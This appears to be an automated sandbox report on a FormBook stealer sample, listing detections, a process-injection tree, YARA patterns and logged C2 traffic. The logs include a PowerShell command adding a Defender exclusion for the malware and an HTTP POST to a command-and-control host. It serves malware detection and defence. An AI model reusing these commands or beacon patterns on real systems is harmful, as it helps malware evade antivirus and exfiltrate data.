Windows Analysis Report
NdYuOgHbM9.exe

Overview

General Information

Sample name: NdYuOgHbM9.exe (renamed because original name is a hash value)
Original sample name: 1bb742c209872385c5b456d066fccf141ab2405245953c135b36029a3dbd5bee.exe
Analysis ID: 1438237
MD5: 664eddacb00d2d58f85cdc2913a1680e
SHA1: 3dfce1917291ff78513dba84e8ac715700d814d7
SHA256: 1bb742c209872385c5b456d066fccf141ab2405245953c135b36029a3dbd5bee
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
Yara detected UAC Bypass using CMSTP
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Disables UAC (registry)
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • NdYuOgHbM9.exe (PID: 2060 cmdline: "C:\Users\user\Desktop\NdYuOgHbM9.exe" MD5: 664EDDACB00D2D58F85CDC2913A1680E)
    • conhost.exe (PID: 3548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7404 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • notepad.exe (PID: 6608 cmdline: "C:\Windows\System32\notepad.exe" MD5: 27F71B12CB585541885A31BE22F61C83)
    • ngen.exe (PID: 7212 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" MD5: 417D6EA61C097F8DF6FEF2A57F9692DF)
      • tyVvDSdgzXcAfzWUYqtqOHNMkF.exe (PID: 6044 cmdline: "C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sfc.exe (PID: 7660 cmdline: "C:\Windows\SysWOW64\sfc.exe" MD5: 4D2662964EF299131D049EC1278BE08B)
          • tyVvDSdgzXcAfzWUYqtqOHNMkF.exe (PID: 2132 cmdline: "C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7956 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • ngen.exe (PID: 7224 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" MD5: 417D6EA61C097F8DF6FEF2A57F9692DF)
    • WerFault.exe (PID: 7296 cmdline: C:\Windows\system32\WerFault.exe -u -p 2060 -s 1572 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a430:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13aef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2a430:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13aef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
5.2.ngen.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.ngen.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2d983:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17042:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
5.2.ngen.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.ngen.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2cb83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16242:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NdYuOgHbM9.exe", ParentImage: C:\Users\user\Desktop\NdYuOgHbM9.exe, ParentProcessId: 2060, ParentProcessName: NdYuOgHbM9.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force, ProcessId: 1856, ProcessName: powershell.exe
            Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\NdYuOgHbM9.exe", ParentImage: C:\Users\user\Desktop\NdYuOgHbM9.exe, ParentProcessId: 2060, ParentProcessName: NdYuOgHbM9.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force, ProcessId: 1856, ProcessName: powershell.exe
            No Snort rule has matched

            AV Detection

            Source: NdYuOgHbM9.exe, ReversingLabs: Detection: 42%
            Source: NdYuOgHbM9.exe, Virustotal: Detection: 39%
            Source: Yara match, File source: 5.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 5.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0000000C.00000002.4092649802.0000000002F30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.1847525772.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000C.00000002.4092708936.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.1847829194.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.4094582069.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000005.00000002.1849163774.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000B.00000002.4092694801.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Exploits

            Source: Yara match, File source: 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: Process Memory Space: NdYuOgHbM9.exe PID: 2060, type: MEMORYSTR
            Source: NdYuOgHbM9.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: mscorlib.pdbMZ source: WER943D.tmp.dmp.9.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: ngen.pdb source: sfc.exe, 0000000C.00000002.4093679938.000000000379C000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4091957268.0000000002CE4000.00000004.00000020.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.000000000332C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2130456184.000000001A6AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.pdb` source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.ni.pdbRSDS source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: wntdll.pdbUGP source: ngen.exe, 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1849713302.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1847772604.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: wntdll.pdb source: ngen.exe, ngen.exe, 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, sfc.exe, 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1849713302.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1847772604.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sfc.pdbGCTL source: ngen.exe, 00000005.00000002.1847926282.00000000052A7000.00000004.00000020.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092313230.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER943D.tmp.dmp.9.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Core.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: mscorlib.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER943D.tmp.dmp.9.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092220680.0000000000B1E000.00000002.00000001.01000000.00000007.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000000.1911809244.0000000000B1E000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: System.Drawing.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: mscorlib.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Core.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: sfc.pdb source: ngen.exe, 00000005.00000002.1847926282.00000000052A7000.00000004.00000020.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092313230.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER943D.tmp.dmp.9.dr
            Source: C:\Windows\SysWOW64\sfc.exe, Code function: 12_2_02A9B800 FindFirstFileW,FindNextFileW,FindClose, 12_2_02A9B800
            Source: C:\Windows\SysWOW64\sfc.exe, Code function: 4x nop then xor eax, eax, 12_2_02A89310
            Source: C:\Windows\SysWOW64\sfc.exe, Code function: 4x nop then pop edi, 12_2_02A8DAC6

            Networking

            Source: DNS query: www.selectif.xyz
            Source: Joe Sandbox View, IP Address: 62.149.128.40
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown, HTTP traffic detected:
            POST /wu8v/ HTTP/1.1
            Host: www.auetravel.kz
            Accept: */*
            Accept-Language: en-US,en;q=0.9
            Accept-Encoding: gzip, deflate, br
            Origin: http://www.auetravel.kz
            Cache-Control: no-cache
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 204
            Connection: close
            Referer: http://www.auetravel.kz/wu8v/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 08 May 2024 12:05:23 GMTServer: ApacheX-SERVER: 3908Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 75 38 76 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /wu8v/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Wed, 08 May 2024 12:05:56 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 
68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 08 May 2024 12:06:00 GMT Connection: close Content-Length: 1163
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 08 May 2024 12:06:03 GMT Connection: close Content-Length: 1163
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 08 May 2024 12:06:05 GMT Connection: close Content-Length: 1163
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 May 2024 12:06:14 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Content-Encoding: br
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 May 2024 12:06:17 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Content-Encoding: br
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 May 2024 12:06:21 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Content-Encoding: br
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 May 2024 12:06:24 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 196 Connection: close Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 12:06:45 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 12:06:48 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 12:06:50 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 12:06:53 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 12:07:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 12:07:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 12:07:05 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 12:07:08 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Wed, 08 May 2024 12:07:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Cache-Enabled: True X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Link: <http://getgoodscrub.com/wp-json/>; rel="https://api.w.org/" X-Httpd-Modphp: 1 Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-Proxy-Cache-Info: DT:1 Content-Encoding: br
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 12:07:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Cache-Enabled: TrueX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockLink: <http://getgoodscrub.com/wp-json/>; rel="https://api.w.org/"X-Httpd-Modphp: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Content-Encoding: br
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 12:07:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Cache-Enabled: TrueX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockLink: <http://getgoodscrub.com/wp-json/>; rel="https://api.w.org/"X-Httpd-Modphp: 1Host-Header: 8441280b0c35cbc1147f8ba998a563a7X-Proxy-Cache-Info: DT:1Content-Encoding: br
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 12:07:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 12:07:32 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 May 2024 12:07:35 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzip
